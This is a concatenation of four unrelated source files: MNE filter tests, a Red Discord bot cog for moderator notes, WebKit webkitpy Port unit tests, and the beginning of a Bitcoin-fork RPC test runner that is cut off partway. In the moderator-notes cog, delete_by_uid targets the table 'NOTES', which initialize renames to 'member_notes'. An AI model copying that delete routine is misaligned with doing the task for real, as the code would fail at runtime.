assert_raises(ValueError, filter_data, x[np.newaxis], -sfreq, 1, 10)
assert_raises(ValueError, filter_data, x[np.newaxis], sfreq, 1,
sfreq * 0.75)
def test_cuda():
"""Test CUDA-based filtering"""
# NOTE: don't make test_cuda() the last test, or pycuda might spew
# some warnings about clean-up failing
# Also, using `n_jobs='cuda'` on a non-CUDA system should be fine,
# as it should fall back to using n_jobs=1.
sfreq = 500
sig_len_secs = 20
a = rng.randn(sig_len_secs * sfreq)
with catch_logging() as log_file:
for fl in ['auto', '10s', 2048]:
bp = band_pass_filter(a, sfreq, 4, 8, fl, 1.0, 1.0, n_jobs=1,
phase='zero', fir_window='hann')
bs = band_stop_filter(a, sfreq, 4 - 1.0, 8 + 1.0, fl, 1.0, 1.0,
n_jobs=1, phase='zero', fir_window='hann')
lp = low_pass_filter(a, sfreq, 8, fl, 1.0, n_jobs=1, phase='zero',
fir_window='hann')
hp = high_pass_filter(lp, sfreq, 4, fl, 1.0, n_jobs=1,
phase='zero', fir_window='hann')
bp_c = band_pass_filter(a, sfreq, 4, 8, fl, 1.0, 1.0,
n_jobs='cuda', verbose='INFO',
phase='zero', fir_window='hann')
bs_c = band_stop_filter(a, sfreq, 4 - 1.0, 8 + 1.0, fl, 1.0, 1.0,
n_jobs='cuda', verbose='INFO',
phase='zero', fir_window='hann')
lp_c = low_pass_filter(a, sfreq, 8, fl, 1.0,
n_jobs='cuda', verbose='INFO',
phase='zero', fir_window='hann')
hp_c = high_pass_filter(lp, sfreq, 4, fl, 1.0,
n_jobs='cuda', verbose='INFO',
phase='zero', fir_window='hann')
assert_array_almost_equal(bp, bp_c, 12)
assert_array_almost_equal(bs, bs_c, 12)
assert_array_almost_equal(lp, lp_c, 12)
assert_array_almost_equal(hp, hp_c, 12)
# check to make sure we actually used CUDA
out = log_file.getvalue().split('\n')[:-1]
# triage based on whether or not we actually expected to use CUDA
from mne.cuda import _cuda_capable # allow above funs to set it
tot = 12 if _cuda_capable else 0
assert_true(sum(['Using CUDA for FFT FIR filtering' in o
for o in out]) == tot)
# check resampling
for window in ('boxcar', 'triang'):
for N in (997, 1000): # one prime, one even
a = rng.randn(2, N)
for fro, to in ((1, 2), (2, 1), (1, 3), (3, 1)):
a1 = resample(a, fro, to, n_jobs=1, npad='auto',
window=window)
a2 = resample(a, fro, to, n_jobs='cuda', npad='auto',
window=window)
assert_allclose(a1, a2, rtol=1e-7, atol=1e-14)
assert_array_almost_equal(a1, a2, 14)
assert_array_equal(resample([0, 0], 2, 1, n_jobs='cuda'), [0., 0., 0., 0.])
assert_array_equal(resample(np.zeros(2, np.float32), 2, 1, n_jobs='cuda'),
[0., 0., 0., 0.])
def test_detrend():
"""Test zeroth and first order detrending"""
x = np.arange(10)
assert_array_almost_equal(detrend(x, 1), np.zeros_like(x))
x = np.ones(10)
assert_array_almost_equal(detrend(x, 0), np.zeros_like(x))
run_tests_if_main()
|
|
from __future__ import annotations
import asyncio
import logging
from datetime import datetime
from typing import Iterator, Literal, NamedTuple, Optional
import discord
from redbot.core import checks, commands
from redbot.core.bot import Red
from redbot.core.data_manager import cog_data_path
from redbot.core.utils import menus
from .apsw_wrapper import Connection
from .converters import MemberOrID
log = logging.getLogger("red.sinbadcogs.modnotes")
class Note(NamedTuple):
uid: int
author_id: int
subject_id: int
guild_id: int
note: str
created_at: int
def embed(self, ctx, color) -> discord.Embed:
e = discord.Embed(
description=self.note,
timestamp=datetime.fromtimestamp(self.created_at),
color=color,
)
author = ctx.guild.get_member(self.author_id)
subject = ctx.guild.get_member(self.subject_id)
a_str = (
f"{author} ({self.author_id})"
if author
else f"Unknown Author ({self.author_id})"
)
s_str = (
f"{subject} ({self.subject_id})"
if subject
else f"Unknown Subject ({self.subject_id})"
)
e.add_field(name="Note Author", value=a_str)
e.add_field(name="Note Subject", value=s_str)
return e
class ModNotes(commands.Cog):
"""
Store moderation notes
"""
__version__ = "340.0.0"
async def red_delete_data_for_user(
self,
*,
requester: Literal["discord_deleted_user", "owner", "user", "user_strict"],
user_id: int,
):
if requester != "discord_deleted_user":
return
await self.bot.send_to_owners(
f"Data deletion request for `ModNotes` by {requester} for user id {user_id}."
)
def format_help_for_context(self, ctx):
pre_processed = super().format_help_for_context(ctx)
return f"{pre_processed}\nCog Version: {self.__version__}"
def __init__(self, bot: Red):
self.bot: Red = bot
fp = str(cog_data_path(self) / "notes.db")
self._connection = Connection(fp)
self._ready_event = asyncio.Event()
self._init_task: Optional[asyncio.Task] = None
def init(self):
self._init_task = asyncio.create_task(self.initialize())
def done_callback(fut: asyncio.Future):
try:
fut.exception()
except asyncio.CancelledError:
log.info("Modnotes didn't set up and was cancelled")
except asyncio.InvalidStateError as exc:
log.exception(
"We somehow have a done callback when not done?", exc_info=exc
)
except Exception as exc:
log.exception("Unexpected exception in modnotes: ", exc_info=exc)
self._init_task.add_done_callback(done_callback)
async def initialize(self):
await self.bot.wait_until_ready()
with self._connection.with_cursor() as cursor:
cursor.execute("""PRAGMA journal_mode=wal""")
# rename if exists NOTES -> member_notes
cursor.execute("""PRAGMA table_info("NOTES")""")
if cursor.fetchone():
cursor.execute("""ALTER TABLE NOTES RENAME TO member_notes""")
cursor.execute(
"""
CREATE TABLE IF NOT EXISTS member_notes (
uid INTEGER PRIMARY KEY AUTOINCREMENT,
author_id INTEGER NOT NULL,
subject_id INTEGER NOT NULL,
guild_id INTEGER NOT NULL,
note TEXT,
created INTEGER NOT NULL
)
"""
)
# If lookups feel slow,
# Consider an index later on member_notes(subject_id, guild_id)
self._ready_event.set()
async def cog_before_invoke(self, ctx):
await self._ready_event.wait()
def cog_unload(self):
if self._init_task:
self._init_task.cancel()
def insert(self, *, author_id: int, subject_id: int, guild_id: int, note: str):
with self._connection.with_cursor() as cursor:
now = int(datetime.utcnow().timestamp())
cursor.execute(
"""
INSERT INTO member_notes(author_id, subject_id, guild_id, note, created)
VALUES(?,?,?,?,?)
""",
(author_id, subject_id, guild_id, note, now),
)
def find_by_author(self, author_id: int) -> Iterator[Note]:
with self._connection.with_cursor() as cursor:
for items in cursor.execute(
"""
SELECT uid, author_id, subject_id, guild_id, note, created
FROM member_notes
WHERE author_id=?
ORDER BY created
""",
(author_id,),
):
yield Note(*items)
def find_by_author_in_guild(
self, *, author_id: int, guild_id: int
) -> Iterator[Note]:
with self._connection.with_cursor() as cursor:
for items in cursor.execute(
"""
SELECT uid, author_id, subject_id, guild_id, note, created
FROM member_notes
WHERE author_id=? AND guild_id=?
ORDER BY created
""",
(author_id, guild_id),
):
yield Note(*items)
def find_by_member(self, *, member_id: int, guild_id: int) -> Iterator[Note]:
with self._connection.with_cursor() as cursor:
for items in cursor.execute(
"""
SELECT uid, author_id, subject_id, guild_id, note, created
FROM member_notes
WHERE subject_id=? AND guild_id=?
ORDER BY created
""",
(member_id, guild_id),
):
yield Note(*items)
def find_by_guild(self, guild_id: int) -> Iterator[Note]:
with self._connection.with_cursor() as cursor:
for items in cursor.execute(
"""
SELECT uid, author_id, subject_id, guild_id, note, created
FROM member_notes
WHERE guild_id=?
ORDER BY created
""",
(guild_id,),
):
yield Note(*items)
def delete_by_uid(self, uid: int):
with self._connection.with_cursor() as cursor:
cursor.execute("DELETE FROM NOTES WHERE uid=?", (uid,))
@checks.mod()
@commands.guild_only()
@commands.command()
async def makemodnote(self, ctx, user: MemberOrID, *, note: str):
""" Make a note about a user """
self.insert(
author_id=ctx.author.id,
subject_id=user.id,
note=note,
guild_id=ctx.guild.id,
)
await ctx.tick()
@checks.mod()
@commands.guild_only()
@commands.group()
async def getmodnotes(self, ctx):
""" Get notes """
pass
@getmodnotes.command()
async def about(self, ctx, user: MemberOrID):
""" Get notes about a user """
color = await ctx.embed_color()
notes = [
n.embed(ctx, color)
for n in self.find_by_member(member_id=user.id, guild_id=ctx.guild.id)
]
if not notes:
return await ctx.send("No mod notes about this user")
mx = len(notes)
for i, n in enumerate(notes, 1):
n.title = f"Showing #{i} of {mx} found notes"
await menus.menu(ctx, notes, menus.DEFAULT_CONTROLS)
|
|
# Copyright (C) 2010 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import logging
import optparse
import sys
import tempfile
import unittest2 as unittest
from webkitpy.common.system.executive import Executive, ScriptError
from webkitpy.common.system import executive_mock
from webkitpy.common.system.filesystem_mock import MockFileSystem
from webkitpy.common.system.outputcapture import OutputCapture
from webkitpy.common.system.path import abspath_to_uri
from webkitpy.thirdparty.mock import Mock
from webkitpy.tool.mocktool import MockOptions
from webkitpy.common.system.executive_mock import MockExecutive, MockExecutive2
from webkitpy.common.system.systemhost_mock import MockSystemHost
from webkitpy.port import Port, Driver, DriverOutput
from webkitpy.port.test import add_unit_tests_to_mock_filesystem, TestPort
class PortTest(unittest.TestCase):
def make_port(self, executive=None, with_tests=False, port_name=None, **kwargs):
host = MockSystemHost()
if executive:
host.executive = executive
if with_tests:
add_unit_tests_to_mock_filesystem(host.filesystem)
return TestPort(host, **kwargs)
return Port(host, port_name or 'baseport', **kwargs)
def test_default_child_processes(self):
port = self.make_port()
self.assertIsNotNone(port.default_child_processes())
def test_format_wdiff_output_as_html(self):
output = "OUTPUT %s %s %s" % (Port._WDIFF_DEL, Port._WDIFF_ADD, Port._WDIFF_END)
html = self.make_port()._format_wdiff_output_as_html(output)
expected_html = "<head><style>.del { background: #faa; } .add { background: #afa; }</style></head><pre>OUTPUT <span class=del> <span class=add> </span></pre>"
self.assertEqual(html, expected_html)
def test_wdiff_command(self):
port = self.make_port()
port._path_to_wdiff = lambda: "/path/to/wdiff"
command = port._wdiff_command("/actual/path", "/expected/path")
expected_command = [
"/path/to/wdiff",
"--start-delete=##WDIFF_DEL##",
"--end-delete=##WDIFF_END##",
"--start-insert=##WDIFF_ADD##",
"--end-insert=##WDIFF_END##",
"/actual/path",
"/expected/path",
]
self.assertEqual(command, expected_command)
def _file_with_contents(self, contents, encoding="utf-8"):
new_file = tempfile.NamedTemporaryFile()
new_file.write(contents.encode(encoding))
new_file.flush()
return new_file
def test_pretty_patch_os_error(self):
port = self.make_port(executive=executive_mock.MockExecutive2(exception=OSError))
oc = OutputCapture()
oc.capture_output()
self.assertEqual(port.pretty_patch_text("patch.txt"),
port._pretty_patch_error_html)
# This tests repeated calls to make sure we cache the result.
self.assertEqual(port.pretty_patch_text("patch.txt"),
port._pretty_patch_error_html)
oc.restore_output()
def test_pretty_patch_script_error(self):
# FIXME: This is some ugly white-box test hacking ...
port = self.make_port(executive=executive_mock.MockExecutive2(exception=ScriptError))
port._pretty_patch_available = True
self.assertEqual(port.pretty_patch_text("patch.txt"),
port._pretty_patch_error_html)
# This tests repeated calls to make sure we cache the result.
self.assertEqual(port.pretty_patch_text("patch.txt"),
port._pretty_patch_error_html)
def integration_test_run_wdiff(self):
executive = Executive()
# This may fail on some systems. We could ask the port
# object for the wdiff path, but since we don't know what
# port object to use, this is sufficient for now.
try:
wdiff_path = executive.run_command(["which", "wdiff"]).rstrip()
except Exception, e:
wdiff_path = None
port = self.make_port(executive=executive)
port._path_to_wdiff = lambda: wdiff_path
if wdiff_path:
# "with tempfile.NamedTemporaryFile() as actual" does not seem to work in Python 2.5
actual = self._file_with_contents(u"foo")
expected = self._file_with_contents(u"bar")
wdiff = port._run_wdiff(actual.name, expected.name)
expected_wdiff = "<head><style>.del { background: #faa; } .add { background: #afa; }</style></head><pre><span class=del>foo</span><span class=add>bar</span></pre>"
self.assertEqual(wdiff, expected_wdiff)
# Running the full wdiff_text method should give the same result.
port._wdiff_available = True # In case it's somehow already disabled.
wdiff = port.wdiff_text(actual.name, expected.name)
self.assertEqual(wdiff, expected_wdiff)
# wdiff should still be available after running wdiff_text with a valid diff.
self.assertTrue(port._wdiff_available)
actual.close()
expected.close()
# Bogus paths should raise a script error.
self.assertRaises(ScriptError, port._run_wdiff, "/does/not/exist", "/does/not/exist2")
self.assertRaises(ScriptError, port.wdiff_text, "/does/not/exist", "/does/not/exist2")
# wdiff will still be available after running wdiff_text with invalid paths.
self.assertTrue(port._wdiff_available)
# If wdiff does not exist _run_wdiff should throw an OSError.
port._path_to_wdiff = lambda: "/invalid/path/to/wdiff"
self.assertRaises(OSError, port._run_wdiff, "foo", "bar")
# wdiff_text should not throw an error if wdiff does not exist.
self.assertEqual(port.wdiff_text("foo", "bar"), "")
# However wdiff should not be available after running wdiff_text if wdiff is missing.
self.assertFalse(port._wdiff_available)
def test_wdiff_text(self):
port = self.make_port()
port.wdiff_available = lambda: True
port._run_wdiff = lambda a, b: 'PASS'
self.assertEqual('PASS', port.wdiff_text(None, None))
def test_diff_text(self):
port = self.make_port()
# Make sure that we don't run into decoding exceptions when the
# filenames are unicode, with regular or malformed input (expected or
# actual input is always raw bytes, not unicode).
port.diff_text('exp', 'act', 'exp.txt', 'act.txt')
port.diff_text('exp', 'act', u'exp.txt', 'act.txt')
port.diff_text('exp', 'act', u'a\xac\u1234\u20ac\U00008000', 'act.txt')
port.diff_text('exp' + chr(255), 'act', 'exp.txt', 'act.txt')
port.diff_text('exp' + chr(255), 'act', u'exp.txt', 'act.txt')
# Though expected and actual files should always be read in with no
# encoding (and be stored as str objects), test unicode inputs just to
# be safe.
port.diff_text(u'exp', 'act', 'exp.txt', 'act.txt')
port.diff_text(
u'a\xac\u1234\u20ac\U00008000', 'act', 'exp.txt', 'act.txt')
# And make sure we actually get diff output.
diff = port.diff_text('foo', 'bar', 'exp.txt', 'act.txt')
self.assertIn('foo', diff)
self.assertIn('bar', diff)
self.assertIn('exp.txt', diff)
self.assertIn('act.txt', diff)
self.assertNotIn('nosuchthing', diff)
def test_setup_test_run(self):
port = self.make_port()
# This routine is a no-op. We just test it for coverage.
port.setup_test_run()
def test_test_dirs(self):
port = self.make_port()
port.host.filesystem.write_text_file(port.layout_tests_dir() + '/canvas/test', '')
port.host.filesystem.write_text_file(port.layout_tests_dir() + '/css2.1/test', '')
dirs = port.test_dirs()
self.assertIn('canvas', dirs)
self.assertIn('css2.1', dirs)
def test_skipped_perf_tests(self):
port = self.make_port()
def add_text_file(dirname, filename, content='some content'):
dirname = port.host.filesystem.join(port.perf_tests_dir(), dirname)
port.host.filesystem.maybe_make_directory(dirname)
port.host.filesystem.write_text_file(port.host.filesystem.join(dirname, filename), content)
add_text_file('inspector', 'test1.html')
add_text_file('inspector', 'unsupported_test1.html')
add_text_file('inspector', 'test2.html')
add_text_file('inspector/resources', 'resource_file.html')
add_text_file('unsupported', 'unsupported_test2.html')
add_text_file('', 'Skipped', '\n'.join(['Layout', '', 'SunSpider', 'Supported/some-test.html']))
self.assertEqual(port.skipped_perf_tests(), ['Layout', 'SunSpider', 'Supported/some-test.html'])
def test_get_option__set(self):
options, args = optparse.OptionParser().parse_args([])
options.foo = 'bar'
port = self.make_port(options=options)
self.assertEqual(port.get_option('foo'), 'bar')
def test_get_option__unset(self):
port = self.make_port()
self.assertIsNone(port.get_option('foo'))
def test_get_option__default(self):
port = self.make_port()
self.assertEqual(port.get_option('foo', 'bar'), 'bar')
def test_additional_platform_directory(self):
port = self.make_port(port_name='foo')
port.default_baseline_search_path = lambda: ['LayoutTests/platform/foo']
layout_test_dir = port.layout_tests_dir()
test_file = 'fast/test.html'
# No additional platform directory
self.assertEqual(
port.expected_baselines(test_file, '.txt'),
[(None, 'fast/test-expected.txt')])
self.assertEqual(port.baseline_path(), 'LayoutTests/platform/foo')
# Simple additional platform directory
port._options.additional_platform_directory = ['/tmp/local-baselines']
port._filesystem.write_text_file('/tmp/local-baselines/fast/test-expected.txt', 'foo')
self.assertEqual(
port.expected_baselines(test_file, '.txt'),
[('/tmp/local-baselines', 'fast/test-expected.txt')])
self.assertEqual(port.baseline_path(), '/tmp/local-baselines')
# Multiple additional platform directories
port._options.additional_platform_directory = ['/foo', '/tmp/local-baselines']
self.assertEqual(
port.expected_baselines(test_file, '.txt'),
[('/tmp/local-baselines', 'fast/test-expected.txt')])
self.assertEqual(port.baseline_path(), '/foo')
def test_nonexistant_expectations(self):
port = self.make_port(port_name='foo')
port.expectations_files = lambda: ['/mock-checkout/LayoutTests/platform/exists/TestExpectations', '/mock-checkout/LayoutTests/platform/nonexistant/TestExpectations']
port._filesystem.write_text_file('/mock-checkout/LayoutTests/platform/exists/TestExpectations', '')
self.assertEqual('\n'.join(port.expectations_dict().keys()), '/mock-checkout/LayoutTests/platform/exists/TestExpectations')
def test_additional_expectations(self):
port = self.make_port(port_name='foo')
port.port_name = 'foo'
port._filesystem.write_text_file('/mock-checkout/LayoutTests/platform/foo/TestExpectations', '')
port._filesystem.write_text_file(
'/tmp/additional-expectations-1.txt', 'content1\n')
port._filesystem.write_text_file(
'/tmp/additional-expectations-2.txt', 'content2\n')
self.assertEqual('\n'.join(port.expectations_dict().values()), '')
port._options.additional_expectations = [
'/tmp/additional-expectations-1.txt']
self.assertEqual('\n'.join(port.expectations_dict().values()), '\ncontent1\n')
port._options.additional_expectations = [
'/tmp/nonexistent-file', '/tmp/additional-expectations-1.txt']
self.assertEqual('\n'.join(port.expectations_dict().values()), '\ncontent1\n')
port._options.additional_expectations = [
'/tmp/additional-expectations-1.txt', '/tmp/additional-expectations-2.txt']
self.assertEqual('\n'.join(port.expectations_dict().values()), '\ncontent1\n\ncontent2\n')
def test_additional_env_var(self):
port = self.make_port(options=optparse.Values({'additional_env_var': ['FOO=BAR', 'BAR=FOO']}))
self.assertEqual(port.get_option('additional_env_var'), ['FOO=BAR', 'BAR=FOO'])
environment = port.setup_environ_for_server()
self.assertTrue(('FOO' in environment) & ('BAR' in environment))
self.assertEqual(environment['FOO'], 'BAR')
self.assertEqual(environment['BAR'], 'FOO')
def test_uses_test_expectations_file(self):
port = self.make_port(port_name='foo')
port.port_name = 'foo'
port.path_to_test_expectations_file = lambda: '/mock-results/TestExpectations'
self.assertFalse(port.uses_test_expectations_file())
port._filesystem = MockFileSystem({'/mock-results/TestExpectations': ''})
self.assertTrue(port.uses_test_expectations_file())
def test_find_no_paths_specified(self):
port = self.make_port(with_tests=True)
layout_tests_dir = port.layout_tests_dir()
tests = port.tests([])
self.assertNotEqual(len(tests), 0)
def test_find_one_test(self):
port = self.make_port(with_tests=True)
tests = port.tests(['failures/expected/image.html'])
self.assertEqual(len(tests), 1)
def test_find_glob(self):
port = self.make_port(with_tests=True)
tests = port.tests(['failures/expected/im*'])
self.assertEqual(len(tests), 2)
def test_find_with_skipped_directories(self):
port = self.make_port(with_tests=True)
tests = port.tests(['userscripts'])
self.assertNotIn('userscripts/resources/iframe.html', tests)
def test_find_with_skipped_directories_2(self):
port = self.make_port(with_tests=True)
tests = port.tests(['userscripts/resources'])
self.assertEqual(tests, [])
def test_is_test_file(self):
filesystem = MockFileSystem()
self.assertTrue(Port._is_test_file(filesystem, '', 'foo.html'))
self.assertTrue(Port._is_test_file(filesystem, '', 'foo.shtml'))
self.assertTrue(Port._is_test_file(filesystem, '', 'foo.svg'))
self.assertTrue(Port._is_test_file(filesystem, '', 'test-ref-test.html'))
self.assertFalse(Port._is_test_file(filesystem, '', 'foo.png'))
self.assertFalse(Port._is_test_file(filesystem, '', 'foo-expected.html'))
self.assertFalse(Port._is_test_file(filesystem, '', 'foo-expected.svg'))
self.assertFalse(Port._is_test_file(filesystem, '', 'foo-expected.xht'))
self.assertFalse(Port._is_test_file(filesystem, '', 'foo-expected-mismatch.html'))
self.assertFalse(Port._is_test_file(filesystem, '', 'foo-expected-mismatch.svg'))
self.assertFalse(Port._is_test_file(filesystem, '', 'foo-expected-mismatch.xhtml'))
self.assertFalse(Port._is_test_file(filesystem, '', 'foo-ref.html'))
self.assertFalse(Port._is_test_file(filesystem, '', 'foo-notref.html'))
self.assertFalse(Port._is_test_file(filesystem, '', 'foo-notref.xht'))
self.assertFalse(Port._is_test_file(filesystem, '', 'foo-ref.xhtml'))
self.assertFalse(Port._is_test_file(filesystem, '', 'ref-foo.html'))
self.assertFalse(Port._is_test_file(filesystem, '', 'notref-foo.xhr'))
def test_is_reference_html_file(self):
filesystem = MockFileSystem()
self.assertTrue(Port.is_reference_html_file(filesystem, '', 'foo-expected.html'))
self.assertTrue(Port.is_reference_html_file(filesystem, '', 'foo-expected-mismatch.xml'))
self.assertTrue(Port.is_reference_html_file(filesystem, '', 'foo-ref.xhtml'))
self.assertTrue(Port.is_reference_html_file(filesystem, '', 'foo-notref.svg'))
self.assertFalse(Port.is_reference_html_file(filesystem, '', 'foo.html'))
self.assertFalse(Port.is_reference_html_file(filesystem, '', 'foo-expected.txt'))
self.assertFalse(Port.is_reference_html_file(filesystem, '', 'foo-expected.shtml'))
self.assertFalse(Port.is_reference_html_file(filesystem, '', 'foo-expected.php'))
self.assertFalse(Port.is_reference_html_file(filesystem, '', 'foo-expected.mht'))
def test_parse_reftest_list(self):
port = self.make_port(with_tests=True)
port.host.filesystem.files['bar/reftest.list'] = "\n".join(["== test.html test-ref.html",
"",
"# some comment",
"!= test-2.html test-notref.html # more comments",
"== test-3.html test-ref.html",
"== test-3.html test-ref2.html",
"!= test-3.html test-notref.html"])
reftest_list = Port._parse_reftest_list(port.host.filesystem, 'bar')
self.assertEqual(reftest_list, {'bar/test.html': [('==', 'bar/test-ref.html')],
'bar/test-2.html': [('!=', 'bar/test-notref.html')],
'bar/test-3.html': [('==', 'bar/test-ref.html'), ('==', 'bar/test-ref2.html'), ('!=', 'bar/test-notref.html')]})
def test_reference_files(self):
port = self.make_port(with_tests=True)
self.assertEqual(port.reference_files('passes/svgreftest.svg'), [('==', port.layout_tests_dir() + '/passes/svgreftest-expected.svg')])
self.assertEqual(port.reference_files('passes/xhtreftest.svg'), [('==', port.layout_tests_dir() + '/passes/xhtreftest-expected.html')])
self.assertEqual(port.reference_files('passes/phpreftest.php'), [('!=', port.layout_tests_dir() + '/passes/phpreftest-expected-mismatch.svg')])
def test_operating_system(self):
self.assertEqual('mac', self.make_port().operating_system())
def test_http_server_supports_ipv6(self):
port = self.make_port()
self.assertTrue(port.http_server_supports_ipv6())
port.host.platform.os_name = 'cygwin'
self.assertFalse(port.http_server_supports_ipv6())
port.host.platform.os_name = 'win'
self.assertTrue(port.http_server_supports_ipv6())
def test_check_httpd_success(self):
port = self.make_port(executive=MockExecutive2())
port._path_to_apache = lambda: '/usr/sbin/httpd'
capture = OutputCapture()
capture.capture_output()
self.assertTrue(port.check_httpd())
_, _, logs = capture.restore_output()
self.assertEqual('', logs)
def test_httpd_returns_error_code(self):
port = self.make_port(executive=MockExecutive2(exit_code=1))
port._path_to_apache = lambda: '/usr/sbin/httpd'
capture = OutputCapture()
capture.capture_output()
self.assertFalse(port.check_httpd())
_, _, logs = capture.restore_output()
self.assertEqual('httpd seems broken. Cannot run http tests.\n', logs)
def test_test_exists(self):
port = self.make_port(with_tests=True)
self.assertTrue(port.test_exists('passes'))
self.assertTrue(port.test_exists('passes/text.html'))
self.assertFalse(port.test_exists('passes/does_not_exist.html'))
self.assertTrue(port.test_exists('virtual'))
self.assertFalse(port.test_exists('virtual/does_not_exist.html'))
self.assertTrue(port.test_exists('virtual/passes/text.html'))
def test_test_isfile(self):
port = self.make_port(with_tests=True)
self.assertFalse(port.test_isfile('passes'))
self.assertTrue(port.test_isfile('passes/text.html'))
self.assertFalse(port.test_isfile('passes/does_not_exist.html'))
self.assertFalse(port.test_isfile('virtual'))
self.assertTrue(port.test_isfile('virtual/passes/text.html'))
self.assertFalse(port.test_isfile('virtual/does_not_exist.html'))
def test_test_isdir(self):
port = self.make_port(with_tests=True)
self.assertTrue(port.test_isdir('passes'))
self.assertFalse(port.test_isdir('passes/text.html'))
self.assertFalse(port.test_isdir('passes/does_not_exist.html'))
self.assertFalse(port.test_isdir('passes/does_not_exist/'))
self.assertTrue(port.test_isdir('virtual'))
self.assertFalse(port.test_isdir('virtual/does_not_exist.html'))
self.assertFalse(port.test_isdir('virtual/does_not_exist/'))
self.assertFalse(port.test_isdir('virtual/passes/text.html'))
def test_tests(self):
port = self.make_port(with_tests=True)
tests = port.tests([])
self.assertIn('passes/text.html', tests)
self.assertIn('virtual/passes/text.html', tests)
tests = port.tests(['passes'])
self.assertIn('passes/text.html', tests)
self.assertIn('passes/passes/test-virtual-passes.html', tests)
self.assertNotIn('virtual/passes/text.html', tests)
tests = port.tests(['virtual/passes'])
self.assertNotIn('passes/text.html', tests)
self.assertIn('virtual/passes/test-virtual-passes.html', tests)
self.assertIn('virtual/passes/passes/test-virtual-passes.html', tests)
self.assertNotIn('virtual/passes/test-virtual-virtual/passes.html', tests)
self.assertNotIn('virtual/passes/virtual/passes/test-virtual-passes.html', tests)
def test_build_path(self):
port = self.make_port(options=optparse.Values({'build_directory': '/my-build-directory/'}))
self.assertEqual(port._build_path(), '/my-build-directory/Release')
class NaturalCompareTest(unittest.TestCase):
def setUp(self):
self._port = TestPort(MockSystemHost())
def assert_cmp(self, x, y, result):
self.assertEqual(cmp(self._port._natural_sort_key(x), self._port._natural_sort_key(y)), result)
def test_natural_compare(self):
self.assert_cmp('a', 'a', 0)
self.assert_cmp('ab', 'a', 1)
self.assert_cmp('a', 'ab', -1)
self.assert_cmp('', '', 0)
self.assert_cmp('', 'ab', -1)
self.assert_cmp('1', '2', -1)
self.assert_cmp('2', '1', 1)
self.assert_cmp('1', '10', -1)
self.assert_cmp('2', '10', -1)
self.assert_cmp('foo_1.html', 'foo_2.html', -1)
self.assert_cmp('foo_1.1.html', 'foo_2.html', -1)
self.assert_cmp('foo_1.html', 'foo_10.html', -1)
self.assert_cmp('foo_2.html', 'foo_10.html', -1)
self.assert_cmp('foo_23.html', 'foo_10.html', 1)
self.assert_cmp('foo_23.html', 'foo_100.html', -1)
class KeyCompareTest(unittest.TestCase):
def setUp(self):
self._port = TestPort(MockSystemHost())
def assert_cmp(self, x, y, result):
self.assertEqual(cmp(self._port.test_key(x), self._port.test_key(y)), result)
def test_test_key(self):
self.assert_cmp('/a', '/a', 0)
self.assert_cmp('/a', '/b', -1)
self.assert_cmp('/a2', '/a10', -1)
self.assert_cmp('/a2/foo', '/a10/foo', -1)
self.assert_cmp('/a/foo11', '/a/foo2', 1)
self.assert_cmp('/ab', '/a/a/b', -1)
self.assert_cmp('/a/a/b', '/ab', 1)
self.assert_cmp('/foo-bar/baz', '/foo/baz', -1)
|
|
#!/usr/bin/env python2
# Copyright (c) 2014-2015 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""
Run Regression Test Suite
This module calls down into individual test cases via subprocess. It will
forward all unrecognized arguments onto the individual test scripts, other
than:
- `-extended`: run the "extended" test suite in addition to the basic one.
- `-win`: signal that this is running in a Windows environment, and we
should run the tests.
- `--coverage`: this generates a basic coverage report for the RPC
interface.
For a description of arguments recognized by test scripts, see
`qa/pull-tester/test_framework/test_framework.py:BitcoinTestFramework.main`.
"""
import os
import time
import shutil
import sys
import subprocess
import tempfile
import re
from tests_config import *
#If imported values are not defined then set to zero (or disabled)
if 'ENABLE_WALLET' not in vars():
ENABLE_WALLET=0
if 'ENABLE_BITCOIND' not in vars():
ENABLE_BITCOIND=0
if 'ENABLE_UTILS' not in vars():
ENABLE_UTILS=0
if 'ENABLE_ZMQ' not in vars():
ENABLE_ZMQ=0
ENABLE_COVERAGE=0
#Create a set to store arguments and create the passOn string
opts = set()
passOn = ""
p = re.compile("^--")
bold = ("","")
if (os.name == 'posix'):
bold = ('\033[0m', '\033[1m')
for arg in sys.argv[1:]:
if arg == '--coverage':
ENABLE_COVERAGE = 1
elif (p.match(arg) or arg == "-h"):
passOn += " " + arg
else:
opts.add(arg)
#Set env vars
buildDir = BUILDDIR
if "INNOVAD" not in os.environ:
os.environ["INNOVAD"] = buildDir + '/src/innovad' + EXEEXT
if "INNOVACLI" not in os.environ:
os.environ["INNOVACLI"] = buildDir + '/src/innova-cli' + EXEEXT
if EXEEXT == ".exe" and "-win" not in opts:
# https://github.com/bitcoin/bitcoin/commit/d52802551752140cf41f0d9a225a43e84404d3e9
# https://github.com/bitcoin/bitcoin/pull/5677#issuecomment-136646964
print "Win tests currently disabled by default. Use -win option to enable"
sys.exit(0)
if not (ENABLE_WALLET == 1 and ENABLE_UTILS == 1 and ENABLE_BITCOIND == 1):
print "No rpc tests to run. Wallet, utils, and bitcoind must all be enabled"
sys.exit(0)
# python-zmq may not be installed. Handle this gracefully and with some helpful info
